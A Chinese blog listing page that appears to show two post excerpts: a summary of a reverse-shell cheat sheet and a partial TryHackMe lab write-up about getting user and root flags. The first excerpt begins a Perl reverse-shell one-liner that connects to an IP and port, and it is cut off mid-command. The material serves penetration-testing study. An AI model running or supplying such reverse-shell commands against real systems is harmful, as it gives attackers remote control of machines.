摘要:
https://github.com/security-cheatsheet/reverse-shell-cheatsheet 反向shell作弊表 perl -e 'use Socket; $i="192.168.0.5"; # 目標 IP 地址 $p=4545; # 目標端口 socket(S, 閱讀全文
posted @ 2025-04-25 22:23
Xia0_0
閱讀(8)
評論(0)
推薦(0)
PS:我寫的這不是完整的做題wp,而是針對這個靶機做些提煉和總結,完整的wp推薦 目標是拿到普通用戶和root用戶的flag,換句話說,就是拿到相應權限 要點 連接 直接訪問靶機IP,會出現這個 原因是.thm不是個標準域名后綴,一般用于TryHackMe這樣的滲透測試平臺或內部網絡環境。所以直接訪 閱讀全文